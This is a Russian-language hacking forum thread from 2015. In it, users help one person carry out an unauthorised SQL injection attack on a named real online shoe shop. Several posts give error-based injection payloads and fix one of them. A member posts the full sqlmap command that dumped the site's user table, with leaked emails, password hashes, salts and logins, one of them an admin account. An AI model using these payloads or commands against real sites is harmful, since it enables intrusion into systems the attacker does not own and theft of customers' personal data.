Нашел инъекцию, а дальше???

joomla · 26 Aug 2015

Здравствуйте, коллеги Вообщем недавно решил помимо разработки сайтов научиться взламывать сайты. Нарыл один интересный интернет-магазин, и сразу же нашел SQL инъекцию.

Вообщем что только не придумывал, и union прописывал и т.д.
Вылетает одна и та же хрень, ошибка синтаксиса. Инъекция работает если ставить " кавычку.

Какие еще могут быть варианты для взлома?

Br@!ns · 26 Aug 2015

Пробуйте error based вектор. например:
'or(ExtractValue(1,concat(0x3a,(select(version())))))='1
или
'-updatexml(0,repeat(version(),2),2)#

SaNDER · 26 Aug 2015

Чувак я советую полностью тебе ссылку закрывать,я её через inurl нашёл .

joomla · 27 Aug 2015

SaNDER said: ↑

Чувак я советую полностью тебе ссылку закрывать,я её через inurl нашёл .
Click to expand...

да все равно, кто нашел, тот молодец. Сайт я взломать пытаюсь не для корыстной цели, а для практики.

----------------------------------

joomla · 27 Aug 2015

Br@!ns said: ↑

Пробуйте error based вектор. например:
'or(ExtractValue(1,concat(0x3a,(select(version())))))='1
или
'-updatexml(0,repeat(version(),2),2)#
Click to expand...

Не помогло....

yarbabin · 27 Aug 2015

"))))||1+group+by+concat(version(),floor(rand(0)*2))having+min(0)%23
в ошибке увидите версию

SaNDER · 27 Aug 2015

yarbabin said: ↑

"))))||1+group+by+concat(version(),floor(rand(0)*2))having+min(0)%23
в ошибке увидите версию
Click to expand...

Тоже не пашет .

BabaDook · 27 Aug 2015

yarbabin said: ↑

"))))||1+group+by+concat(version(),floor(rand(0)*2))having+min(0)%23
в ошибке увидите версию
Click to expand...

а какого типа эта инъекция, если можно манукльчик ))

OxoTnik · 27 Aug 2015

BabaDook said: ↑

а какого типа эта инъекция, если можно манукльчик ))
Click to expand...

error based

joomla · 28 Aug 2015

Вообщем кому интересно ломануть сайтик, а потом рассказать (поделиться опытом), как это сделал, вот ссыль - http://xn--80abd6ar5a2c.xn--p1ai/
Инъекция - http://xn--80abd6ar5a2c.xn--p1ai/shop/product/filter?productFilter[_ef][gender][]=Мужская"

hicel · 28 Aug 2015

SaNDER said: ↑

Тоже не пашет .
Click to expand...

Пашет всё=)

joomla · 28 Aug 2015

hicel said: ↑

Пашет всё=)
Click to expand...

что-то не получается

kingbeef · 28 Aug 2015

joomla said: ↑

что-то не получается
Click to expand...

Убери одну скобку в запросе.
")))||1+group+by+concat(version(),floor(rand(0)*2))having+min(0)%23

Надо ошибки тоже читать.

joomla · 28 Aug 2015

kingbeef said: ↑

Убери одну скобку в запросе.
")))||1+group+by+concat(version(),floor(rand(0)*2))having+min(0)%23

Надо ошибки тоже читать.
Click to expand...

красавчик ))

strelok20094 · 29 Aug 2015

base: w106051
Table: user
[5 entries]
+----------------------+---------------+-------------------------------+-------------+
| email | password | salt | login |
+----------------------+---------------+-------------------------------+-------------+
| @ya.ru | $2nWSDmGDU.V6 | $2a$14$2JzmyFg/HuG55/xYBrIXMA | delvin |
| @altlogic.ru | $22dAubujSFfU | $2a$14$EnpIvtkw.xRbLRzjwbquxg | admin |
| @mail.ru | $2JpCew0SKvc. | $2a$14$ltDzAFvK5i0qU33i2nvaPg | durova_vita |
| @tagan.ru | $24LkUVLWIjU2 | $2a$14$tk2uQd0jCUpmApJ6kmSB/g | dmi |
| @gmail.com | $2KvStv//sqiM | $2a$14$VNPbpZZMDzNBW8Lt9JD6dw | obuvka |
+----------------------+---------------+-------------------------------+-------------+

sqlmap -u "http://обувъка.рф/shop/product/filter?productFilter[_ef][gender][]="*" --dbms Mysql --time-sec 10 --threads 10 --level 3 --risk 3 --technique E -D w106051 -T user -C email,password,salt,login --dump

joomla · 29 Aug 2015

strelok20094 said: ↑

base: w106051
Table: user
[5 entries]
+----------------------+---------------+-------------------------------+-------------+
| email | password | salt | login |
+----------------------+---------------+-------------------------------+-------------+
| @ya.ru | $2nWSDmGDU.V6 | $2a$14$2JzmyFg/HuG55/xYBrIXMA | delvin |
| @altlogic.ru | $22dAubujSFfU | $2a$14$EnpIvtkw.xRbLRzjwbquxg | admin |
| @mail.ru | $2JpCew0SKvc. | $2a$14$ltDzAFvK5i0qU33i2nvaPg | durova_vita |
| @tagan.ru | $24LkUVLWIjU2 | $2a$14$tk2uQd0jCUpmApJ6kmSB/g | dmi |
| @gmail.com | $2KvStv//sqiM | $2a$14$VNPbpZZMDzNBW8Lt9JD6dw | obuvka |
+----------------------+---------------+-------------------------------+-------------+

sqlmap -u "http://обувъка.рф/shop/product/filter?productFilter[_ef][gender][]="*" --dbms Mysql --time-sec 10 --threads 10 --level 3 --risk 3 --technique E -D w106051 -T user -C email,password,salt,login --dump
Click to expand...

Можете рассказать как сделали?

hicel · 29 Aug 2015

joomla said: ↑

Можете рассказать как сделали?
Click to expand...

sqlmap гугли...

joomla · 29 Aug 2015

hicel said: ↑

sqlmap гугли...
Click to expand...

От души

hicel · 29 Aug 2015

joomla said: ↑

От души
Click to expand...

Так то думать надо .... читать ...
(sqlmap - хороший софт, но лучше учись сам раскручивать ИМХО.)

darkart · 29 Oct 2015

hicel said: ↑

Так то думать надо .... читать ...
(sqlmap - хороший софт, но лучше учись сам раскручивать ИМХО.)
Click to expand...

зачем изобретать велосипед? есть софт он работает
по логу можно понять что происходит
а вот если автоматизация не прокатила то да имеет смысл копать руками!
п.с. имхо

Нашел инъекцию, а дальше???

joomla New Member

Br@!ns Elder - Старейшина

SaNDER Banned

joomla New Member

joomla New Member

yarbabin HACKIN YO KUT

SaNDER Banned

BabaDook Well-Known Member

OxoTnik На мышей

joomla New Member

hicel New Member

joomla New Member

kingbeef Reservists Of Antichat

joomla New Member

strelok20094 Member

joomla New Member

hicel New Member

joomla New Member

hicel New Member

darkart Member

Useful Searches

Нашел инъекцию, а дальше???

joomla New Member

Br@!ns Elder - Старейшина

SaNDER Banned

joomla New Member

joomla New Member

yarbabin HACKIN YO KUT

SaNDER Banned

BabaDook Well-Known Member

OxoTnik На мышей

joomla New Member

hicel New Member

joomla New Member

kingbeef Reservists Of Antichat

joomla New Member

strelok20094 Member

joomla New Member

hicel New Member

joomla New Member

hicel New Member

darkart Member